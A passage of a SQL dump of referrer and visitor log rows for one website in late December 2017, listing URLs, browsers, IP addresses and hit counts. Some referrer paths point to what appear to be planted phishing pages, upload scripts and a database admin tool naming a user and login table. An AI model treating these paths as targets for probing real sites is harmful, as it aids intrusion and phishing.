blgz.org','MSIE','Windows','8.0','','52.27.2.86','000',1,0),(16164,'2017-12-23','http://www.szucs.ru/','MSIE','Windows','6.0','','46.118.121.38','000',3,0),(16165,'2017-12-23','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.102.7.249','000',1,0),(16166,'2017-12-23','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.80','000',1,0),(16167,'2017-12-23','https://zphiblgz.org/','Chrome','Linux','41.0.2272.118','','66.102.7.248','000',1,0),(16168,'2017-12-23','https://zphiblgz.org','Chrome','Windows','62.0.3177.0','','41.200.142.38','000',10,0),(16169,'2017-12-23','https://zphiblgz.org','Firefox','Windows','7.0.1','','31.185.27.201','000',1,0),(16170,'2017-12-23','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.171','000',2,0),(16171,'2017-12-23','https://zphiblgz.org','Safari','iPhone','10.0','','41.200.142.38','000',1,0),(16172,'2017-12-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','72.14.199.128','000',1,0),(16173,'2017-12-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','72.14.199.131','000',1,0),(16174,'2017-12-23','https://zphiblgz.org','Firefox','Windows','56.0','','185.96.92.225','000',1,0),(16175,'2017-12-23','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','138.197.64.73','000',20,0),(16176,'2017-12-23','https://zphiblgz.org','Chrome','Macintosh','18.0.1025.166','','5.9.112.6','000',1,0),(16177,'2017-12-23','https://www.google.com/','Chrome','Windows','62.0.3202.94','','66.102.6.6','000',2,0),(16178,'2017-12-23','http://zphiblgz.org/cache/hot18/2e2uknaj9kbqqk5podntdrgo.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Chrome','Windows','62.0.3202.94','','66.102.6.12','000',1,0),(16179,'2017-12-23','http://zphiblgz.org/cache/hot18','Chrome','Windows','62.0.3202.94','','66.102.6.8','000',1,0),(16180,'2017-12-23','http://site.ru','Chrome','Windows','5.0.375.99','','69.195.124.62','000',2,0),(16181,'2017-12-23','http://site.ru','Chrome','Windows','5.0.375.99','','162.144.192.143','000',2,0),(16182,'2017-12-23','https://zphiblgz.org','Chrome','Linux','57.0.2987.133','','46.229.170.197','000',1,0),(16183,'2017-12-24','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',4006,0),(16184,'2017-12-24','http://site.ru','Chrome','Windows','5.0.375.99','','192.237.180.100','000',2,0),(16185,'2017-12-24','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','69.243.54.200','000',2,0),(16186,'2017-12-24','http://site.ru','Chrome','Windows','5.0.375.99','','67.210.122.221','000',2,0),(16187,'2017-12-24','https://zphiblgz.org','Firefox','Windows','40.1','','79.54.146.28','000',3,0),(16188,'2017-12-24','https://zphiblgz.org','MSIE','Windows','11.0','','5.255.182.105','000',2,0),(16189,'2017-12-24','https://zphiblgz.org','MailChimp','Unknown','Unknown','','104.196.196.40','000',2,0),(16190,'2017-12-24','https://rocketchange.ru/','MSIE','Windows','6.0','','46.118.121.38','000',6,0),(16191,'2017-12-24','https://zphiblgz.org','MSIE','Windows','8.0','','150.70.188.171','000',1,0),(16192,'2017-12-24','http://www.zphiblgz.org/jm-ajax/upload_file/','Chrome','Windows','42.0.2311.152','','207.244.157.138','000',3,0),(16193,'2017-12-24','https://zphiblgz.org','Chrome','Windows','62.0.3177.0','','41.200.116.136','000',7,0),(16194,'2017-12-24','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','184.168.152.175','000',1,0),(16195,'2017-12-24','https://zphiblgz.org','Safari','Macintosh','11.0','','184.168.152.175','000',1,0),(16196,'2017-12-24','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(16197,'2017-12-24','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(16198,'2017-12-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.127.133','000',1,0),(16199,'2017-12-24','https://supermama.top/','Opera','Windows','9.00','','178.137.94.65','000',1,0),(16200,'2017-12-24','https://voloo.ru/','MSIE','Windows','6.0','','134.249.52.116','000',3,0),(16201,'2017-12-24','https://zphiblgz.org','Firefox','Windows','34.0','','212.34.124.83','000',1,0),(16202,'2017-12-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','155.64.38.77','000',2,0),(16203,'2017-12-24','http://choice-credit.ru/obzory/557-polozhitelnye-svojstva-kreditnykh-kart','MSIE','Windows','6.0','','188.163.78.30','000',3,0),(16204,'2017-12-24','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','13.67.140.36','000',1,0),(16205,'2017-12-24','https://zphiblgz.org','MSIE','Windows','9.0','','82.239.225.86','000',7,0),(16206,'2017-12-24','http://l.instagram.com/?u=http%3A%2F%2Fwww.zphiblgz.org%2Fscholarships&e=ATN7RZopCsZtCoJEQIYK_8hQM30FCMfQwcM0eiEGk-wfDkToFDAeMiPwit3kD_AX2PWjPWyUFxaPfz2TfOfVey_YnE7hdSts','AppleWebKit','iPhone','604.4.7','','76.100.200.217','000',10,0),(16207,'2017-12-24','https://zphiblgz.org','Safari','iPhone','11.0','','76.100.200.217','000',6,0),(16208,'2017-12-24','https://zphiblgz.org','Chrome','Android','63.0.3239.111','','49.98.133.250','000',4,0),(16209,'2017-12-24','https://zphiblgz.org','Firefox','Windows','40.1','','113.160.112.125','000',3,0),(16210,'2017-12-24','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','188.121.41.161','000',1,0),(16211,'2017-12-24','https://zphiblgz.org','Firefox','Windows','56.0','','188.121.41.161','000',1,0),(16212,'2017-12-24','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1646.8JwSDw0nKmGkquKAXcG4XBMwvyGf6gzRfB5eIM4tVQJ-cHRTw9DOjnq9osX-m6oF.4ee1a6d7b221a5fed97246a7d99c19a3d91f64b2&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YL_nDC5hqtEQ6WayFoZKRZE&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIVlE5M1MxRWZoT3pYU3Y5T3FRU2ZNdVpFTzdNTWdJSkl4Q0JQakVyb2FyazhCWDdaU0tRWlhu&b64e=2&sign=1a8e551783f52326bcd4fd9ce210292e&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTC9kttsucdFNCRsskMA60n0_DYL2cZTD4Rtuy1xijfk65gq3kAlZZKaNXZSChZWb5R1b5Q577UM_HL0HClb0xZaM2_lpj7D6s39tvtgQExH9DtR4D56JplQ&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUano4BEc9IEca8Wj2p7VSMvZzgr7Lzp_8DyPFOpnBsWB0V72zP3KSzpFpizP5rP3ZHBlG0uDnk6A&l10n=ru&cts=1514173058504&mc=1.50791070411','Chrome','Windows','61.0.3163.100','','46.242.116.223','000',2,0),(16213,'2017-12-25','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',1913,0),(16214,'2017-12-25','http://search.myway.com/search/GGmain.jhtml?n=781c5578&p2=%5EZ5%5Exdm273%5ETTAB02%5Eus&pg=GGmain&pn=1&ptb=7895DAFD-8191-406D-A69C-26ED9579505A&qs=&searchfor=1981+zeta+phi+beta+graduate+chapter+howard+university&si=XXXXXXXXXX&ss=sub&st=tab&tpr=sbt&trs=wtt','Chrome','Windows','63.0.3239.108','','99.119.7.214','000',5,0),(16215,'2017-12-25','https://zphiblgz.org/cache/hot18/qmqxf3zuyt406s7e4mjc3s1k.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','196.54.55.19','000',1,0),(16216,'2017-12-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','194.187.170.108','000',2,0),(16217,'2017-12-25','http://titangel-vietnam.com/','MSIE','Windows','6.0','','134.249.64.243','000',3,0),(16218,'2017-12-25','http://1001watch.com.ua/','MSIE','Unknown','7.0b','','188.163.78.30','000',1,0),(16219,'2017-12-25','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.149','000',1,0),(16220,'2017-12-25','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','108.237.80.202','000',3,0),(16221,'2017-12-25','http://onlineporno.site/','Opera','Windows','7.11','','178.137.94.65','000',3,0),(16222,'2017-12-25','https://zphiblgz.org','Firefox','Linux','47.0','','157.14.240.250','000',2,0),(16223,'2017-12-25','https://zphiblgz.org','MSIE','Windows','6.0','','165.227.105.146','000',1,0),(16224,'2017-12-25','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1646.Tk-Jh3O0GSNGWHaNgJk4tiryBJ41x_ORWHkIYCXeDimWSWMR-XPoObu1WXka6X3b.a6cf46b57386e2fcaabfd9a04c8e02889c2a9f35&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGv9iZwKiy-E54GYiollMFA&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIVlE5M1MxRWZoT3pXMXlFZmQ5T2tzNVRiemtsbS1sTUxtU3NqdVNmeDc3MWdrdER2cF9DMjhH&b64e=2&sign=14c5521a395e537df6e44e3a16ba8757&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv48nA84pg4kxSYHoJD20HKdU4rUan7GeVgX-ABpxgb8tPyLKLShPBpnOGM5p__vfvTyIj5DUDPnTT5UcRXmRAGuaKPg7rDTVo7oiwCkKkIEt55PfdOQq_Gv0ikWESx1ESP&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUPlG4bHKQJvOKU60TwveoKpUSjnOM_eC29iRyDYWGzMvoXjQBTZXozdr4Y65txbCzclovSo8yopQ&l10n=ru&cts=1514199578227&mc=6.24381510797','Chrome','Windows','61.0.3163.100','','46.242.116.223','000',2,0),(16225,'2017-12-25','http://zphiblgz.org/tag/%E5%B7%A8%E4%BA%BA%E9%87%A3%E3%82%8A/','MSIE','Windows','9.0','','144.76.132.76','000',4,0),(16226,'2017-12-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','104.218.63.73','000',1,0),(16227,'2017-12-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',2,0),(16228,'2017-12-25','http://travels.co.ua/','Opera','Windows','8.00','','134.249.52.116','000',1,0),(16229,'2017-12-25','https://zphiblgz.org','Firefox','Windows','21.0','','144.76.153.198','000',1,0),(16230,'2017-12-25','https://zphiblgz.org','MSIE','Windows','9.0','','69.30.246.114','000',90,0),(16231,'2017-12-25','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1646.FbmGf0UfF6pwbMrLCOChElMWWDdW9GCVJx7oZIAHfrvcZuuCAL_pwII-2ePe7zfX.002da3337e144b873e342f8de2bf073cf487f491&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YKCJkrjchpDstTwxTkjwGrA&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIVlE5M1MxRWZoT3phZW5LOVY3NnVnQUw1M0FXS3pYWHd0b2gzRHUzVm1NVXFiMFRoMkFvOWpH&b64e=2&sign=b6027b500d579dde9a29a66ff0dce472&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbiCIblFPU-pwXA1UTWAunpbqCXGubHCF_oVKd0GepYPBbikQCrg4GgWdMFqAstaXmAcETrFVq05jO3nPxtTYdfN0ddUkRLQZVU0uIJa892812LWbj1xjescjSuzzNFRFt4&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVLVIUOk4qiENDVtwDzud_0JkQf8Mrg1N-CalKnvZTnsv2U1XmPyyTUs5kuPOz9KYwpVje2AFqiKw&l10n=ru&cts=1514205729875&mc=1.96259655092','MSIE','Windows','10.0','','46.242.63.143','000',1,0),(16232,'2017-12-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.30','000',2,0),(16233,'2017-12-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.45.7','000',1,0),(16234,'2017-12-25','https://zphiblgz.org/','Firefox','Windows','3.5.0','','69.30.246.114','000',2,0),(16235,'2017-12-25','http://zphiblgz.org/','Safari','Macintosh','9.1.2','','94.177.163.88','000',3,0),(16236,'2017-12-25','https://zphiblgz.org','Chrome','Linux','59.0.3071.109','','192.198.80.227','000',2,0),(16237,'2017-12-25','https://zphiblgz.org','Chrome','Windows','62.0.3177.0','','41.200.116.136','000',9,0),(16238,'2017-12-25','https://www.google.com/','Chrome','Windows','62.0.3202.94','','66.249.88.64','000',1,0),(16239,'2017-12-25','https://www.google.com/','Chrome','Windows','23.0.1271.64','','66.102.6.4','000',1,0),(16240,'2017-12-25','http://zphiblgz.org/cache/hot18/2e2uknaj9kbqqk5podntdrgo.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Chrome','Windows','62.0.3202.94','','66.249.88.76','000',1,0),(16241,'2017-12-25','http://zphiblgz.org/cache/hot18','Chrome','Windows','23.0.1271.64','','66.102.6.8','000',1,0),(16242,'2017-12-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.141.220','000',1,0),(16243,'2017-12-25','https://zphiblgz.org','Safari','iPhone','10.0','','41.200.116.136','000',5,0),(16244,'2017-12-25','74.220.219.51','Firefox','Windows','33.0','','162.243.69.215','000',1,0),(16245,'2017-12-25','https://zphiblgz.org','MSIE','Windows','8.0','','64.235.154.141','000',2,0),(16246,'2017-12-25','https://www.google.com/','Chrome','Android','62.0.3202.84','','66.102.8.38','000',1,0),(16247,'2017-12-25','https://www.google.com/','Chrome','Android','62.0.3202.84','','66.102.8.42','000',1,0),(16248,'2017-12-25','https://www.google.com/','Chrome','Android','62.0.3202.84','','66.102.6.6','000',1,0),(16249,'2017-12-25','https://zphiblgz.org/','Chrome','Android','62.0.3202.84','','66.102.8.40','000',1,0),(16250,'2017-12-25','https://www.google.com/','Chrome','Android','62.0.3202.84','','66.102.6.10','000',2,0),(16251,'2017-12-25','https://zphiblgz.org','MSIE','Windows','8.0','','64.235.153.11','000',2,0),(16252,'2017-12-25','https://zphiblgz.org/','MSIE','Windows','10.0','','51.15.217.217','000',1,0),(16253,'2017-12-25','https://zphiblgz.org/cache/v12/bank.php','MSIE','Windows','10.0','','173.239.202.3','000',22,0),(16254,'2017-12-25','https://zphiblgz.org','Java','Unknown','1.6.0','','69.164.111.198','000',22,0),(16255,'2017-12-25','https://zphiblgz.org','Chrome','Windows','41.0.2224.3','','50.19.154.226','000',1,0),(16256,'2017-12-25','https://zphiblgz.org/cache/v12/get_started/bank.php','MSIE','Windows','10.0','','87.114.139.185','000',22,0),(16257,'2017-12-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','94.142.242.84','000',2,0),(16258,'2017-12-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.220.101.1','000',1,0),(16259,'2017-12-25','http://zphiblgz.org/f15600.php','Chrome','Windows','59.0.3071.115','','173.254.28.72','000',1,0),(16260,'2017-12-25','http://zphiblgz.org/cache/mod_mainmenu/flunqswo.php','Safari','iPhone','10.0','','69.89.31.170','000',1,0),(16261,'2017-12-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.73.206','000',2,0),(16262,'2017-12-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.63.43','000',1,0),(16263,'2017-12-25','https://zphiblgz.org','Firefox','Windows','40.1','','5.35.53.173','000',3,0),(16264,'2017-12-25','https://zphiblgz.org/','Firefox','Windows','52.0','','64.71.207.240','000',2,0),(16265,'2017-12-25','https://zphiblgz.org/','Firefox','Windows','50.0','','64.71.196.152','000',1,0),(16266,'2017-12-25','https://zphiblgz.org/wp-content/themes/hopeful/thumb.php','Firefox','Windows','52.0','','64.71.202.102','000',22,0),(16267,'2017-12-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','198.96.155.3','000',2,0),(16268,'2017-12-25','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',6,0),(16269,'2017-12-25','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(16270,'2017-12-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','155.64.38.77','000',2,0),(16271,'2017-12-25','http://zphiblgz.org','Firefox','Windows','54.0','','93.127.128.196','000',3,0),(16272,'2017-12-25','https://zphiblgz.org/','PHP','Unknown','6.3.25','','93.127.128.196','000',1,0),(16273,'2017-12-25','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.242.104','000',1,0),(16274,'2017-12-25','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.243.70','000',2,0),(16275,'2017-12-25','http://zphiblgz.org/cache/v12/get_started/bank.php','MSIE','Windows','10.0','','188.166.63.71','000',22,0),(16276,'2017-12-25','https://zphiblgz.org','Firefox','Macintosh','36.0','','23.254.46.63','000',2,0),(16277,'2017-12-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.26','000',1,0),(16278,'2017-12-25','https://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.49.215','000',3,0),(16279,'2017-12-25','https://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.45.183','000',4,0),(16280,'2017-12-25','https://zphiblgz.org','MSIE','Windows','8.0','','150.70.188.175','000',1,0),(16281,'2017-12-25','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','157.50.13.24','000',2,0),(16282,'2017-12-25','https://zphiblgz.org','WhatsApp','Unknown','2.17.427','','157.50.13.24','000',1,0),(16283,'2017-12-25','https://zphiblgz.org','Safari','iPhone','11.0','','80.195.244.28','000',2,0),(16284,'2017-12-25','https://zphiblgz.org','MSIE','Windows','8.0','','150.70.188.166','000',1,0),(16285,'2017-12-25','https://zphiblgz.org','Firefox','Linux','45.0','','46.119.127.61','000',1,0),(16286,'2017-12-25','https://zphiblgz.org/cache','Firefox','Windows','3.6.8','','89.234.68.89','000',9,0),(16287,'2017-12-25','https://zphiblgz.org/cache','Firefox','Windows','3.6.8','','95.45.252.2','000',9,0),(16288,'2017-12-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','89.31.57.5','000',1,0),(16289,'2017-12-25','https://zphiblgz.org','Firefox','Windows','7.0.1','','204.8.156.142','000',1,0),(16290,'2017-12-25','http://zphiblgz.org/','Firefox','Windows','7.0.1','','171.25.193.25','000',1,0),(16291,'2017-12-25','https://zphiblgz.org','Firefox','Windows','27.0','','62.157.63.208','000',2,0),(16292,'2017-12-25','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.23.133','000',1,0),(16293,'2017-12-25','https://zphiblgz.org/cache/','Firefox','Windows','57.0','','105.191.43.82','000',4,0),(16294,'2017-12-25','https://zphiblgz.org','Firefox','Windows','0.10.1','','177.39.232.144','000',3,0),(16295,'2017-12-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.191.162.181','000',1,0),(16296,'2017-12-25','https://zphiblgz.org','MSIE','Windows','7.0','','219.117.238.170','000',2,0),(16297,'2017-12-25','https://zphiblgz.org','bitlybot','Unknown','3.0','','54.82.29.147','000',1,0),(16298,'2017-12-25','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','157.50.20.113','000',2,0),(16299,'2017-12-25','https://zphiblgz.org','Opera','Windows','12.00','','83.31.67.83','000',2,0),(16300,'2017-12-25','https://zphiblgz.org','Python-urllib','Unknown','2.7','','173.212.240.246','000',47,0),(16301,'2017-12-25','http://zphiblgz.org/cache/v12/get_started/','MSIE','Windows','10.0','','89.244.73.37','000',2,0),(16302,'2017-12-25','https://zphiblgz.org','Chrome','Linux','51.0.2704.79','','88.212.254.13','000',2,0),(16303,'2017-12-25','https://zphiblgz.org','Chrome','Linux','51.0.2704.79','','213.196.39.19','000',2,0),(16304,'2017-12-25','https://zphiblgz.org','Chrome','Linux','51.0.2704.79','','188.42.195.140','000',2,0),(16305,'2017-12-25','https://zphiblgz.org','Chrome','Windows','27.0.1453.94','','5.9.145.132','000',1,0),(16306,'2017-12-26','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',5597,0),(16307,'2017-12-26','https://zphiblgz.org','curl','Unknown','7.26.0','','62.67.194.183','000',4,0),(16308,'2017-12-26','https://zphiblgz.org','MSIE','Windows','11.0','','88.99.62.141','000',4,0),(16309,'2017-12-26','http://zphiblgz.org/cache/v12/get_started','Firefox','Windows','3.6.8','','89.234.68.71','000',10,0),(16310,'2017-12-26','https://zphiblgz.org/cache/','Chrome','Windows','63.0.3239.84','','41.248.146.16','000',6,0),(16311,'2017-12-26','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','173.239.240.99','000',2,0),(16312,'2017-12-26','https://zphiblgz.org','Dalvik','Android','2.1.0','','213.205.192.137','000',2,0),(16313,'2017-12-26','https://zphiblgz.org/Apple_Verify/08b81193c707a67/','Chrome','Android','63.0.3239.111','','27.62.175.73','000',1,0),(16314,'2017-12-26','http://zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','163.172.255.19','000',1,0),(16315,'2017-12-26','zphiblgz.org','Chrome','Windows','50.0.2661.75','','46.101.165.68','000',1,0),(16316,'2017-12-26','https://zphiblgz.org','Firefox','Linux','2.11','','218.50.2.102','000',1,0),(16317,'2017-12-26','https://zphiblgz.org','Konqueror','Unknown','10.13','','203.112.212.238','000',1,0),(16318,'2017-12-26','https://zphiblgz.org','Safari','Unknown','2.6','','101.53.101.172','000',1,0),(16319,'2017-12-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','191.252.92.211','000',1,0),(16320,'2017-12-26','https://zphiblgz.org','B-l-i-t-z-B-O-T','Windows','17.12','','60.13.74.168','000',1,0),(16321,'2017-12-26','https://zphiblgz.org','Konqueror','Unknown','10.13','','79.190.145.141','000',1,0),(16322,'2017-12-26','https://zphiblgz.org','B-l-i-t-z-B-O-T','Linux','11.2','','80.237.54.156','000',1,0),(16323,'2017-12-26','https://zphiblgz.org','GNU','iPhone','Unknown','','91.96.62.240','000',1,0),(16324,'2017-12-26','https://zphiblgz.org','Firefox','Unknown','4.17','','89.186.1.215','000',1,0),(16325,'2017-12-26','https://zphiblgz.org','Konqueror','Linux','3.1','','218.58.70.250','000',1,0),(16326,'2017-12-26','https://zphiblgz.org','GNU','Windows','Unknown','','92.126.153.83','000',1,0),(16327,'2017-12-26','https://zphiblgz.org','Konqueror','Unknown','16.19','','118.193.107.95','000',1,0),(16328,'2017-12-26','https://zphiblgz.org','Flock','Unknown','15.14','','101.53.101.172','000',1,0),(16329,'2017-12-26','https://zphiblgz.org','Tor','Linux','Unknown','','118.89.103.211','000',1,0),(16330,'2017-12-26','https://zphiblgz.org','Konqueror','Linux','3.1','','46.150.169.90','000',1,0),(16331,'2017-12-26','https://zphiblgz.org','SeaMonkey','iPhone','15.20','','118.193.107.240','000',1,0),(16332,'2017-12-26','https://zphiblgz.org','GNU','Windows','Unknown','','14.1.41.201','000',1,0),(16333,'2017-12-26','https://zphiblgz.org','Seamonkey','Linux','17.1','','89.249.250.11','000',1,0),(16334,'2017-12-26','https://zphiblgz.org','Konqueror','Unknown','10.7','','118.193.107.119','000',1,0),(16335,'2017-12-26','https://zphiblgz.org','Tor','Linux','Unknown','','92.126.153.83','000',1,0),(16336,'2017-12-26','https://zphiblgz.org','B-l-i-t-z-B-O-T','Linux','11.2','','118.193.107.230','000',1,0),(16337,'2017-12-26','https://zphiblgz.org','SeaMonkey','iPhone','15.20','','49.48.77.148','000',1,0),(16338,'2017-12-26','https://zphiblgz.org','Seamonkey','Linux','17.1','','118.193.107.3','000',1,0),(16339,'2017-12-26','https://zphiblgz.org','B-l-i-t-z-B-O-T','Linux','11.2','','147.135.210.114','000',1,0),(16340,'2017-12-26','https://zphiblgz.org','Konqueror','Linux','3.1','','103.90.200.226','000',1,0),(16341,'2017-12-26','https://zphiblgz.org','Tor','Linux','Unknown','','142.44.246.58','000',1,0),(16342,'2017-12-26','https://zphiblgz.org','Konqueror','Unknown','10.7','','222.73.68.144','000',1,0),(16343,'2017-12-26','https://zphiblgz.org','Konqueror','Unknown','16.19','','31.145.111.12','000',1,0),(16344,'2017-12-26','https://zphiblgz.org','GNU','Windows','Unknown','','115.87.213.61','000',1,0),(16345,'2017-12-26','https://zphiblgz.org','Firefox','Linux','17.6','','45.76.43.246','000',1,0),(16346,'2017-12-26','https://zphiblgz.org','Tor','Linux','Unknown','','82.117.169.110','000',1,0),(16347,'2017-12-26','https://zphiblgz.org','Konqueror','Unknown','16.19','','78.25.98.114','000',1,0),(16348,'2017-12-26','https://zphiblgz.org','Firefox','Linux','17.6','','123.125.159.122','000',1,0),(16349,'2017-12-26','https://zphiblgz.org','GNU','Windows','Unknown','','118.193.107.130','000',1,0),(16350,'2017-12-26','https://zphiblgz.org','SeaMonkey','iPhone','15.20','','110.77.189.100','000',1,0),(16351,'2017-12-26','https://zphiblgz.org','GNU','Windows','Unknown','','116.199.2.210','000',1,0),(16352,'2017-12-26','https://zphiblgz.org','Opera','Linux','10.19','','80.237.54.156','000',1,0),(16353,'2017-12-26','https://zphiblgz.org','GNU','Windows','Unknown','','123.125.159.122','000',1,0),(16354,'2017-12-26','https://zphiblgz.org','Opera','Linux','10.19','','218.201.102.54','000',1,0),(16355,'2017-12-26','https://zphiblgz.org','GNU','Windows','Unknown','','82.115.31.197','000',1,0),(16356,'2017-12-26','https://zphiblgz.org','GNU','Windows','Unknown','','101.200.89.170','000',1,0),(16357,'2017-12-26','https://zphiblgz.org','GNU','Windows','Unknown','','121.206.54.68','000',1,0),(16358,'2017-12-26','https://zphiblgz.org','Firefox','Windows','9.0','','47.90.87.225','000',1,0),(16359,'2017-12-26','https://zphiblgz.org','GNU','Windows','Unknown','','18.217.179.238','000',1,0),(16360,'2017-12-26','https://zphiblgz.org','Firefox','Windows','9.0','','118.193.107.219','000',1,0),(16361,'2017-12-26','https://zphiblgz.org','Opera','iPad','18.18','','45.76.32.106','000',1,0),(16362,'2017-12-26','https://zphiblgz.org','Opera','iPad','18.18','','66.242.91.23','000',1,0),(16363,'2017-12-26','https://zphiblgz.org','Opera','iPad','18.18','','104.130.207.163','000',1,0),(16364,'2017-12-26','https://zphiblgz.org','Chrome','Unknown','13.17','','178.217.32.142','000',1,0),(16365,'2017-12-26','https://zphiblgz.org','Chrome','Unknown','13.17','','110.77.173.91','000',1,0),(16366,'2017-12-26','https://zphiblgz.org','Dalvik','Android','2.1.0','','109.181.211.6','000',1,0),(16367,'2017-12-26','https://zphiblgz.org/cache/','Chrome','Android','63.0.3239.111','','105.148.182.111','000',2,0),(16368,'2017-12-26','https://zphiblgz.org/wp-content/sms/sms/make.php','Chrome','Android','63.0.3239.111','','27.62.218.89','000',2,0),(16369,'2017-12-26','https://zphiblgz.org','Chrome','Macintosh','59.0.3071.109','','192.198.80.227','000',2,0),(16370,'2017-12-26','https://zphiblgz.org/cache/','Firefox','Windows','57.0','','105.112.28.188','000',2,0),(16371,'2017-12-26','http://porno-chaman.info/','MSIE','Windows','6.0','','178.137.94.65','000',2,0),(16372,'2017-12-26','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','138.197.64.72','000',20,0),(16373,'2017-12-26','https://zphiblgz.org','Chrome','Android','56.0.2924.87','','94.10.224.233','000',2,0),(16374,'2017-12-26','https://zphiblgz.org','Chrome','Windows','63.0.3239.108','','105.105.176.153','000',5,0),(16375,'2017-12-26','https://zphiblgz.org','Safari','iPhone','10.0','','90.217.13.69','000',4,0),(16376,'2017-12-26','https://zphiblgz.org','Safari','iPhone','11.0','','178.107.194.203','000',3,0),(16377,'2017-12-26','https://zphiblgz.org/adminer-4.3.1.php?server=localhost&username=zphiblgz_wor1&db=zphiblgz_wor1&select=lwz_login_log','Chrome','Windows','62.0.3177.0','','77.234.46.201','000',9,0),(16378,'2017-12-26','https://zphiblgz.org','Safari','iPhone','10.0','','78.145.234.84','000',4,0),(16379,'2017-12-26','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.130','000',2,0),(16380,'2017-12-26','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.101.234','000',1,0),(16381,'2017-12-26','https://zphiblgz.org','Firefox','Macintosh','21.0','','148.251.75.46','000',1,0),(16382,'2017-12-26','https://zphiblgz.org/scholarship/application/','Chrome','Windows','63.0.3239.84','','73.173.254.31','000',3,0),(16383,'2017-12-26','https://zphiblgz.org','Edge','Windows','14.14393','','31.52.170.1','000',3,0),(16384,'2017-12-26','https://zphiblgz.org','Firefox','Windows','52.0','','79.172.193.32','000',1,0),(16385,'2017-12-26','https://zphiblgz.org','Firefox','Windows','52.0','','91.109.176.2','000',4,0),(16386,'2017-12-26','https://zphiblgz.org','Chrome','Windows','0.2.149.29','','109.157.100.82','000',9,0),(16387,'2017-12-26','https://zphiblgz.org','Chrome','Android','56.0.2924.87','','80.195.22.117','000',3,0),(16388,'2017-12-26','https://zphiblgz.org','Safari','iPhone','11.0','','80.195.244.28','000',3,0),(16389,'2017-12-26','https://zphiblgz.org','Chrome','Android','63.0.3239.111','','213.205.253.121','000',2,0),(16390,'2017-12-26','https://zphiblgz.org','AppleWebKit','iPhone','604.1.38','','109.157.100.82','000',3,0),(16391,'2017-12-26','https://zphiblgz.org','Dalvik','Android','2.1.0','','86.175.102.235','000',4,0),(16392,'2017-12-26','https://zphib